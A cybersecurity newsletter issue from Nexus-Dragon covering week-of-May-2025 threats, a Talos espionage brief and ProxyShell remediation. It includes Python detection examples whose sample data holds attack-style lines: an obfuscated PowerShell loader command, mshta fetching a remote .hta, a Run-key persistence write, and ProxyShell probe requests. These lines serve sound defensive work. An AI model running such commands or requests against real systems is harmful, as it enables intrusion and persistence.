
Dragon Sight: Emerging Threats & Security Strategies

WEEK OF MAY 26, 2025 | ISSUE 11 | "Stay informed. Stay prepared. Stay secure with Dragon Sight"

This Week in Issue

This week, we honor the brave men and women who gave their lives in service to our country. Their sacrifice is the foundation of the freedoms we enjoy every day. Let us pause to remember those who never came home. From all of us at Nexus-Dragon, we thank our fallen heroes and their families for their courage, commitment, and legacy.

A new Russian cyber-espionage group, Laundry Bear, is targeting Western governments with custom malware, escalating concerns over state-sponsored threats. KrebsOnSecurity endured a massive 6.3 Tbps DDoS attack, underscoring the scale of modern disruption campaigns. DragonForce ransomware exploited SimpleHelp in MSP supply chains, while SEO poisoning tactics spread Bumblebee malware via fake admin tools. TikTok is the latest malware vector, with threat actors using viral videos to push info-stealers through “ClickFix” scams. The FBI also warns of Luna Moth targeting law firms with extortion campaigns.

CYBER NEWS ROUNDUP

Nexus-Dragon Cybersecurity Roundup: News Articles from Around the Web Relevant to the SMB

A newly identified Russian cyber-espionage group, dubbed Laundry Bear, is targeting government entities and NGOs in North America and Europe with stealthy, custom-built malware. These advanced persistent threats (APTs) signal increased risk for supply chain partners and organizations with sensitive ties. Nexus-Dragon flags this as critical for SMBs that may unknowingly serve as gateways to larger targets.
Read more: New Russian Cyberspy Crew 'Laundry Bear'

The latest SANS ISC diary reveals a sharp rise in malicious scanning activity, including attempts to exploit outdated Apache servers and weak RDP ports. SMBs are often soft targets due to default configurations or poor patch hygiene. Nexus-Dragon urges proactive log monitoring and firewall hardening.
Read more: ISC Diary: RSS/31972

A massive distributed denial-of-service (DDoS) attack hit KrebsOnSecurity, nearly reaching 6.3 Tbps, illustrating the sheer volume attackers can now unleash. SMB websites and client portals with weak defenses could be easily overwhelmed. Nexus-Dragon recommends assessing DDoS readiness and engaging mitigation partners now—not after an outage.
Read more: KrebsOnSecurity Hit with Near-Record 6.3 Tbps DDoS

LevelBlue explores how attackers abuse mshta.exe to execute remote payloads and how CyberChef can dissect such activity. This method is especially dangerous because it bypasses common defenses by blending into normal system activity. Nexus-Dragon advises SMBs to disable unnecessary Windows scripting tools and invest in behavioral detection solutions.
Read more: Hunting Malware with MSHTA and CyberChef

Threat actors exploited the remote support tool SimpleHelp to launch ransomware attacks against MSPs and their clients. This supply chain compromise threatens dozens of downstream businesses who rely on third-party IT providers. Nexus-Dragon stresses vendor risk management and insists SMBs validate how service providers secure their remote tools.
Read more: DragonForce Ransomware Abuses SimpleHelp

Cybercriminals are using poisoned search results to lure users into downloading malware-laced copies of popular network tools like Zenmap. This campaign highlights how attackers exploit trusted tools to deceive tech-savvy SMB staff. Nexus-Dragon encourages verified software sourcing and browser-based download scanning.
Read more: Bumblebee Malware Distributed via SEO Poisoning

The FBI warns that Luna Moth is running phishing campaigns against law firms, stealing sensitive data and demanding extortion payments without deploying ransomware. Professional services firms—especially those handling client PII—are at elevated risk. Nexus-Dragon recommends secure email gateways and mandatory phishing simulation training for staff.
Read more: FBI Warns of Luna Moth Extortion Attacks

Hackers are using TikTok trends to drive users to fake tech-support sites, which install infostealer malware under the guise of fixing system issues. SMB employees using corporate devices on social platforms are highly vulnerable. Nexus-Dragon advises web filtering and strong endpoint controls to block malicious redirects.
Read more: TikTok Videos Push Infostealer Malware

This week’s APT roundup reveals sophisticated browser-based threats and NSIS installers laced with spyware, all designed to evade detection and persist silently. SMBs with outdated browsers or unvetted extensions face significant risk. Nexus-Dragon recommends regular browser hygiene and staff training to identify shady extensions.
Read more: Weekly Recap: APT Campaigns & Browser Threats

Cybercriminals are tricking users into downloading spyware through counterfeit VPN and browser installers using the NSIS packaging tool. SMBs that allow BYOD or unmanaged installs are prime targets. Nexus-Dragon urges standardized software deployment policies and download whitelisting.
Read more: Hackers Use Fake VPN and Browser Installers

SANS ISC provides essential guidance on securing your authorized_keys file in SSH configurations, often overlooked yet critical for preventing unauthorized access. Poor SSH hygiene can lead to backdoor access into business-critical systems. Nexus-Dragon suggests auditing all key-based access and enforcing key rotation schedules.
Read more: Securing Your SSH authorized_keys File

Why This Matters

This week’s threats highlight an urgent and growing danger: attackers are evolving faster than many organizations can defend. From the rise of Laundry Bear, a Russian APT targeting Western institutions, to malware campaigns abusing trusted tools like Zenmap and remote support platforms like SimpleHelp, cybercriminals are blending stealth, social engineering, and supply chain compromise into highly effective attacks. CISA’s latest advisories reinforce the risk, calling attention to exploitable vulnerabilities in everyday systems like SSH and public-facing applications. Small and mid-sized businesses—often downstream of larger targets yet lacking enterprise-grade defenses—are increasingly in the crosshairs. With adversaries exploiting everything from TikTok to fake VPN installers, Nexus-Dragon urges SMBs to adopt proactive, layered cybersecurity strategies now—because waiting is no longer an option.

Cyber Hygiene Tips – Week of May 26, 2025

Look into blocking or tightly restricting the use of tools like mshta.exe, which are often exploited by attackers to run hidden malicious scripts, as highlighted in this week’s malware hunting reports.

Verify and audit all remote access tools; these can be exploited in ransomware campaigns if misconfigured or left exposed.

Download software only from verified sources and enforce validation checks—fake VPN and browser installers are actively being used to distribute spyware.

Review SSH configurations, especially the authorized_keys file, to ensure proper permissions, remove unused keys, and rotate them regularly to prevent unauthorized access.

Strengthen defenses against large-scale DDoS attacks by deploying rate limiting, web application firewalls (WAFs), and CDN services; this is critical after the near-record attack on KrebsOnSecurity (it is hard for an SMB to do on its own, so consult your IT team).

Train staff to avoid downloading network tools from search results, as attackers are using SEO poisoning to trick users into installing malware-laced copies of trusted apps.

Implement DNS and web filtering to block access to malicious redirect sites, which are being pushed through platforms like TikTok in social engineering campaigns.

Regularly audit browser extensions and remove unverified or unnecessary add-ons, as browser-based APT threats continue to rise.

For MSPs and IT service providers, enforce strict client segmentation and least privilege controls to contain potential breaches and reduce lateral movement.

Ensure legal and compliance teams are looped into your incident response plans, especially as extortion attacks that do not deploy ransomware, like those from Luna Moth, target professional services.
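
The SSH guidance above (the ISC item on authorized_keys and the tip to audit permissions, remove unused keys and rotate them) as a runnable audit. This is an added example, not code from SANS ISC or Nexus-Dragon; the sample authorized_keys content is constructed with synthetic key blobs that are structurally valid but are not real key pairs, and the issue list is this example's own choice of checks.

```python
import base64, shlex, struct

KEY_PREFIXES = ("ssh-", "ecdsa-", "sk-")
RESTRICTIVE = {"from", "command", "restrict", "no-pty", "no-port-forwarding",
               "no-agent-forwarding", "no-x11-forwarding"}

def ssh_string(b):
    return struct.pack(">I", len(b)) + b  # length-prefixed field inside the key blob

def mpint(n):
    return n.to_bytes(n.bit_length() // 8 + 1, "big")  # extra byte keeps the sign bit clear

def make_blob(key_type, *fields):
    """Assemble a structurally valid (but synthetic) public-key blob for the sample file."""
    return base64.b64encode(b"".join(ssh_string(f) for f in (key_type.encode(), *fields))).decode()

def blob_fields(b64):
    raw, out, i = base64.b64decode(b64), [], 0
    while i < len(raw):
        n = struct.unpack(">I", raw[i:i + 4])[0]
        out.append(raw[i + 4:i + 4 + n])
        i += 4 + n
    return out

# Constructed sample authorized_keys content: synthetic blobs, not real key pairs.
SAMPLE = "\n".join([
    "# deploy key, locked to one network and one command",
    'from="10.0.0.0/8",command="/usr/bin/rrsync /srv" ssh-ed25519 ' + make_blob("ssh-ed25519", bytes(32)) + " deploy@ci",
    "ssh-rsa " + make_blob("ssh-rsa", mpint(65537), mpint((1 << 1023) | 1)) + " old-laptop",
    "ssh-dss " + make_blob("ssh-dss", *(mpint(3),) * 4) + " legacy",
    "restrict,pty ssh-ed25519 " + make_blob("ssh-ed25519", b"\x01" * 32) + " admin@box",
    "ssh-rsa " + make_blob("ssh-rsa", mpint(65537), mpint((1 << 1023) | 1)) + " old-laptop copy",
])

def audit(text, file_mode=0o600):
    """Return (line_no, issue) pairs for weak, unrestricted or duplicate entries and loose file permissions."""
    issues, seen = [], {}
    if file_mode & 0o077:
        issues.append((0, f"file mode {file_mode:o} is readable/writable by group or others"))
    for no, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        toks = shlex.split(line)  # keeps command="/usr/bin/rrsync /srv" as one option token
        options = "" if toks[0].startswith(KEY_PREFIXES) else toks.pop(0)
        key_type, b64 = toks[0], toks[1]
        opts = {o.split("=")[0].lower() for o in options.split(",") if o}
        if key_type == "ssh-dss":
            issues.append((no, "ssh-dss (DSA) key: deprecated and disabled by default in OpenSSH"))
        if key_type == "ssh-rsa":
            bits = int.from_bytes(blob_fields(b64)[2], "big").bit_length()  # field 2 is the modulus
            if bits < 2048:
                issues.append((no, f"ssh-rsa key is only {bits} bits"))
        if not opts & RESTRICTIVE:
            issues.append((no, "no from=/command=/restrict options: usable from anywhere with a full shell"))
        if b64 in seen:
            issues.append((no, f"duplicate of key on line {seen[b64]}"))
        seen.setdefault(b64, no)
    return issues
```

To run it against a real file, pass `open(path).read()` and `os.stat(path).st_mode & 0o777` to `audit`.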

Government advisories

AI Data Security Best Practices: Securing Data Used to Train and Operate AI Systems
https://www.cisa.gov/resources-tools/resources/ai-data-security-best-practices-securing-data-used-train-operate-ai-systems

THREAT FOCUS INFORMATION

Threat Intelligence Brief: Rare Red Flags — Cisco Talos Identifies Scarcity Signals in Cyber-Espionage Campaigns

Overview
Cisco Talos researchers have uncovered a nuanced set of “scarcity signals”—unusual behaviors that, while rare, may serve as high-fidelity indicators of advanced cyber-espionage activity. The blog post outlines how threat actors are leveraging uncommon command-line arguments, unorthodox execution chains, and stealthy evasion techniques to persist within victim environments while avoiding detection. These activities, although individually rare, when analyzed in context, reveal distinct operational patterns of advanced persistent threats (APTs), likely linked to state-sponsored actors conducting intelligence collection operations.

Threat Actor Profile
While Talos does not attribute the observed activity to a named threat group, the operational maturity, command-and-control sophistication, and use of advanced evasion techniques align with nation-state-sponsored espionage operations. These campaigns are suspected to target sectors such as government, defense industrial base (DIB), and critical infrastructure—often exploiting low-noise behavioral indicators that fly under the radar of signature-based detection systems.

Tools and Techniques
Attackers in these campaigns use a mix of legitimate system utilities and custom payloads to evade endpoint detection and response (EDR) solutions. Tools and TTPs include:

  • Uncommon PowerShell flags and command-line arguments

  • Living-off-the-land binaries (LOLBins) such as mshta.exe or regsvr32.exe

  • Non-standard registry persistence

  • Obfuscated malware loaders and reflective DLL injection

Mapped MITRE ATT&CK Techniques

  • T1059.001 – Command and Scripting Interpreter: PowerShell

  • T1218 – Signed Binary Proxy Execution

  • T1112 – Modify Registry

  • T1055 – Process Injection

  • T1036 – Masquerading

Strategic Implications
This campaign exemplifies a broader evolution in cyber-espionage tradecraft: shifting from high-volume, noisy intrusions to precise, stealthy operations using rare artifacts that evade traditional defenses. For organizations in sensitive sectors, this signifies a move away from “detect everything” paradigms to approaches grounded in contextual anomaly detection and behavioral baselining. The presence of these signals may be the only trace of an ongoing compromise—underscoring the need for deeper telemetry analysis and adversary emulation capabilities.

Defensive Recommendations

  • Implement anomaly-based detection rules that flag rare or non-standard PowerShell flags, registry writes, or parent-child process relationships.

  • Hunt for known LOLBins being used in unusual ways, especially with unsigned scripts or remote execution chains.

  • Use endpoint detection platforms that support behavioral mapping and can log command-line arguments.

  • Review registry changes regularly, especially for persistence keys in HKCU\Software\Microsoft\Windows\CurrentVersion\Run.

  • Enforce strict controls on PowerShell usage through constrained language mode and script block logging.
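
The first two recommendations above (anomaly rules for rare PowerShell switches, registry Run-key writes and parent-child pairs, and hunting LOLBins such as mshta.exe used for remote execution, which the mshta item in the news roundup also covers) as a small scoring pass over process-creation telemetry. This is an added example, not code from Cisco Talos or Nexus-Dragon; the events are constructed in the shape of Sysmon Event ID 1 fields, and the "shape seen only once" rule is this example's simplified take on the scarcity idea.

```python
import re
from collections import Counter

# Constructed sample telemetry in Sysmon Event ID 1 style (parent image,
# image, command line). Made-up events, not logs from the Talos report.
EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe", "cmd": "powershell.exe -NoProfile -Command Get-Process"},
    {"parent": "explorer.exe", "image": "powershell.exe", "cmd": "powershell.exe -NoProfile -Command Get-Service"},
    {"parent": "winword.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -ep bypass -enc SQBFAFgA"},
    {"parent": "explorer.exe", "image": "mshta.exe", "cmd": "mshta.exe http://example.invalid/update.hta"},
    {"parent": "cmd.exe", "image": "reg.exe",
     "cmd": r"reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v upd /d C:\Users\u\a.exe"},
    {"parent": "services.exe", "image": "svchost.exe", "cmd": "svchost.exe -k netsvcs"},
]

LOLBINS = {"mshta.exe", "regsvr32.exe", "rundll32.exe"}
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

def switches(cmd):
    """Sorted, lower-cased switch tokens; with the image they define a command's 'shape'."""
    return tuple(sorted(t.lower() for t in cmd.split()[1:] if t[:1] in ("-", "/")))

def powershell_signals(cmd):
    """Switch combinations rare in admin use but routine in loaders (abbreviations included)."""
    toks, found = cmd.lower().split(), []
    for i, t in enumerate(toks):
        nxt = toks[i + 1] if i + 1 < len(toks) else ""
        if t in ("-e", "-ec") or t.startswith("-enc"):
            found.append("encoded command")
        if t in ("-w", "-win", "-windowstyle") and nxt == "hidden":
            found.append("hidden window")
        if t in ("-ep", "-ex", "-executionpolicy") and nxt == "bypass":
            found.append("execution policy bypass")
    return found

def analyze(events):
    """One finding per event: behavioural signals plus whether its shape occurs only once (scarcity)."""
    shape_counts = Counter((e["image"].lower(), switches(e["cmd"])) for e in events)
    findings = []
    for e in events:
        image, cmd, parent = e["image"].lower(), e["cmd"], e["parent"].lower()
        sig = []
        if image in ("powershell.exe", "pwsh.exe"):
            sig += powershell_signals(cmd)
        if image in LOLBINS and re.search(r"https?://|\\\\", cmd, re.I):
            sig.append("lolbin fetching remote content")
        if image == "reg.exe" and "currentversion\\run" in cmd.lower():
            sig.append("run-key persistence write")
        if parent in OFFICE and image in SCRIPT_HOSTS:
            sig.append(f"office parent {parent} spawned {image}")
        rare = shape_counts[(image, switches(cmd))] == 1
        findings.append({"cmd": cmd, "signals": sig, "rare": rare,
                         "priority": "high" if sig and rare else "low"})
    return findings

if __name__ == "__main__":
    print(*[f for f in analyze(EVENTS) if f["signals"]], sep="\n")
```

In production the shape baseline should be counted over days of fleet-wide telemetry, not one batch, so that a routine scheduled task is not "rare" simply because the window is small.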

Why This Matters
These “scarcity signals” represent a growing class of hard-to-detect adversary behaviors—highlighting how threat actors adapt as defenders improve. As geopolitical tensions rise and global cyber-competition intensifies, attackers are increasingly motivated to remain undetected in high-value networks. For SMBs and large enterprises alike, especially those serving sensitive industries, recognizing these signals could be the only warning of a deeply embedded adversary. Cybersecurity teams must evolve their detection strategies to prioritize rare, high-confidence signals over generic noise.

Source
Cisco Talos Intelligence – Scarcity Signals Are Rare Activities Red Flags

Deep Dive: ProxyShell Vulnerabilities in Microsoft Exchange – What to Do

Technical Summary
The ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) are a chain of critical flaws in Microsoft Exchange Server that allow remote code execution without authentication. The chain begins with CVE-2021-34473, a pre-auth path confusion flaw enabling attackers to bypass access control, followed by CVE-2021-34523 for privilege escalation via the PowerShell backend, and finally CVE-2021-31207, a post-auth arbitrary file write leading to full remote code execution. All three were patched in Microsoft security updates KB5001779 and KB5003435 but remain highly dangerous when unpatched.

Recent Exploitation Activity
Security researchers have observed a resurgence in scanning and exploitation attempts against vulnerable Exchange servers, with attackers using known methods to identify and exploit unpatched systems. Malicious infrastructure has been tied to IP addresses actively probing for ProxyShell exposure, including:

  • 190.2.150[.]101

  • 204.216.147[.]144

  • 66.63.179[.]106

  • 89.39.121[.]48

These IPs have been flagged for enumeration activity consistent with reconnaissance for ProxyShell exploitation, which often precedes attempts to deploy web shells or steal sensitive data. The scanning is opportunistic and global, with threat actors targeting government, healthcare, finance, and small-to-midsize businesses (SMBs) with minimal detection (do your own due diligence).

Why This Threat Is Significant
ProxyShell vulnerabilities provide unauthenticated attackers with deep access to Exchange environments, making them a persistent favorite for ransomware operators, cybercriminals, and APT groups. Despite being patched in 2021, many organizations, especially SMBs, have not applied the necessary updates, leaving them vulnerable to mass exploitation. As Exchange remains a core communication platform for thousands of businesses, compromise can lead to email hijacking, data exfiltration, or full domain compromise. This ongoing threat reflects how legacy software, when unpatched, continues to serve as low-hanging fruit for attackers.

Defensive Recommendations

  • Patch Immediately: Ensure Microsoft Exchange servers are updated with KB5001779 and KB5003435, which fix all three ProxyShell CVEs.

  • Monitor for Indicators: Check logs and EDR solutions for access attempts from the listed malicious IPs or signs of /autodiscover/autodiscover.json exploitation.

  • Limit Exposure: Restrict external access to Exchange Admin Center and Remote PowerShell endpoints where possible.

  • Scan for Web Shells: Perform regular scans of Exchange directories for suspicious ASPX files or unauthorized scripts.

  • Enable Network Segmentation: Isolate Exchange servers from critical internal systems to limit lateral movement if breached.
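
The "Monitor for Indicators" recommendation above, as a hunt over IIS W3C logs: it flags requests to /autodiscover/autodiscover.json whose query carries the widely published ProxyShell request shape and any request from the four IPs listed in this section. This is an added example, not code from the newsletter; the log excerpt is constructed (hosts under .invalid, RFC 5737 client addresses plus the listed IPs) and the field list follows a typical IIS #Fields header.

```python
import re
from collections import Counter
from urllib.parse import unquote

# The four IPs the newsletter lists as probing for ProxyShell, copied defanged and refanged here.
WATCHLIST = {ip.replace("[.]", ".") for ip in
             ("190.2.150[.]101", "204.216.147[.]144", "66.63.179[.]106", "89.39.121[.]48")}

# Widely published ProxyShell request shape: the Email= parameter itself names
# autodiscover.json followed by '?' (often %3F) and '@'. Legitimate Autodiscover
# requests carry a real mailbox address in Email= instead.
PROBE = re.compile(r"email=autodiscover/autodiscover\.json\??@", re.I)

# Constructed IIS W3C log excerpt (not real traffic). IIS writes '+' for spaces
# in the User-Agent, so whitespace splitting on these lines is safe.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2025-05-27 08:00:01 GET /owa/ - 10.1.2.3 Mozilla/5.0+(Windows+NT+10.0) 200
2025-05-27 08:00:03 GET /autodiscover/autodiscover.json Email=user%40corp.invalid&Protocol=ActiveSync 10.1.2.4 Outlook/16.0 200
2025-05-27 08:00:05 GET /autodiscover/autodiscover.json @test.invalid/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.invalid 190.2.150.101 python-requests/2.31 200
2025-05-27 08:00:06 POST /autodiscover/autodiscover.json @test.invalid/powershell/?&Email=autodiscover/autodiscover.json%3F@test.invalid 190.2.150.101 python-requests/2.31 200
2025-05-27 08:00:09 GET /autodiscover/autodiscover.json - 203.0.113.7 Mozilla/5.0 401
2025-05-27 08:00:12 GET /ecp/ - 66.63.179.106 Mozilla/5.0 200
"""

def parse(log):
    """Rows as dicts keyed by the #Fields header; comment lines are skipped."""
    fields, rows = None, []
    for line in log.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split())))
    return rows

def classify(row):
    """Reasons a request deserves a look; empty list means nothing notable."""
    reasons = []
    stem, query = row["cs-uri-stem"].lower(), unquote(row["cs-uri-query"])
    if stem == "/autodiscover/autodiscover.json" and PROBE.search(query):
        reasons.append("proxyshell path-confusion request shape")
    if row["c-ip"] in WATCHLIST:
        reasons.append("client IP on the newsletter's ProxyShell watchlist")
    return reasons

def hunt(log):
    """Flagged rows as (c-ip, method, stem, reasons) plus a per-IP hit count."""
    hits = []
    for r in parse(log):
        reasons = classify(r)
        if reasons:
            hits.append((r["c-ip"], r["cs-method"], r["cs-uri-stem"], reasons))
    return hits, Counter(h[0] for h in hits)

if __name__ == "__main__":
    hits, per_ip = hunt(SAMPLE_LOG)
    for h in hits:
        print(*h)
    print(dict(per_ip))
```

A 200 on the probe line is the detail to escalate on a server that should already be patched; a patched server answers these requests with an error.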

Disclaimer
This report includes raw threat intelligence such as IP addresses and TTPs, which may evolve. Always validate findings within your own environment and threat model.

Discover the Nexus-Dragon Ecosystem

Explore Everything at Nexus-Dragon.com. Your Launchpad for Elite Cybersecurity Training and Business-Grade Protection

Comprehensive Learning Subscription (CLS)
The CLS program is more than just certification prep; it’s a full-spectrum, 4-year guided learning pathway for professionals committed to mastering information security and gaining long-term expertise in the field.

www.nexus-dragon.com

Included in CLS:

  • Full prep and resources for CISSP, CEH, CASP+, GBK, and Cyber Training certifications

  • Access to interactive cloud security labs, recorded workshops, and scheduled mentorship

  • Built-in progress tracking, skill assessments, and a structured roadmap to job-ready proficiency

  • Complimentary access to our Basic Cyber Operations (BCO) course for foundational knowledge in network security and incident response

Dragon Armor Cybersecurity Suite
Tailored for small and mid-sized businesses, Dragon Armor delivers serious protection without the complexity of big-ticket enterprise tools. It’s everything you need to secure your environment, designed to scale as you grow.

Included with Dragon Armor:

  • AI-driven threat detection, endpoint security, and real-time response

  • Built-in alignment with HIPAA, NIST Cybersecurity Framework (CSF), and ISO 27001

  • Guided onboarding and a full cybersecurity risk assessment to identify gaps

  • Multi-year price lock and flexible plans that grow with your organization’s needs

Stay Ahead of Cyber Threats with Curated Threat Intelligence

In today’s fast-moving cyber landscape, raw data isn’t enough; you need actionable intelligence tailored to your business. Our Curated Threat Intelligence Service delivers real-time insights, customized threat profiles, and prioritized alerts focused on your industry, your risks, and your critical assets.

We filter the noise, track evolving threat actors, and highlight only what matters most, so you can act faster, defend smarter, and stay resilient. Every report includes high-confidence indicators of compromise (IOCs), mapped MITRE ATT&CK techniques, and strategic recommendations designed to strengthen your defenses.

Protect your business with intelligence built for action, not overwhelm.
Contact us today to start receiving tailored threat intelligence you can trust.

Whether you’re focused on penetration testing, compliance, data privacy, or building out your security operations, Nexus-Dragon equips you with the tools, knowledge, and strategies to lead from the front.

NEW SERVICE NOW ONLINE!

Dragon Armor Advisors (DAA): We Handle the Hiring, You Get the Cyber Experts

Hiring skilled cybersecurity professionals is expensive, time-consuming, and often leads to mismatches. Dragon Armor Advisors (DAA) changes the game by doing the hard part for you. We recruit, vet, train, and manage elite cybersecurity talent so you don’t have to.

Whether you need a security analyst, compliance expert, or incident response lead, Nexus-Dragon handles the full talent pipeline. Our advisors come from top-tier backgrounds, including NSA, DoD, and CISA, and are ready to integrate seamlessly into your team. You gain immediate access to professionals who are already mission-ready without the cost, delays, or risks of full-time hiring.

Let DAA fill your cybersecurity gaps while you stay focused on growth. Keep them as long as you need, and if you want to bring them on permanently, we’ll make it happen.

Tenable Nessus® Expert is the gold standard for vulnerability assessment—built for security teams facing limited resources and a fast-changing threat landscape. It automates point-in-time assessments to help you quickly find, prioritize, and remediate vulnerabilities across operating systems, devices, and applications.
Discover how Nessus Expert can strengthen your defenses.

Ready to move forward?
For full details, customized walkthroughs, or to begin onboarding, contact our team at:

[email protected]
Or explore our solutions directly at:

TELL US HOW WE’RE DOING!

Your feedback is VERY valuable! Let us know how we can improve future issues.

The information provided is for general purposes only and is accurate to the best of our knowledge. We do not guarantee its accuracy or reliability and are not responsible for any outcomes resulting from its use. This post contains affiliate links, meaning we may earn a commission if you purchase through them, at no additional cost to you. Written with the help of our little A.I!

All trademarks belong to their respective owners.

CONTACT US

📞 850-684-0278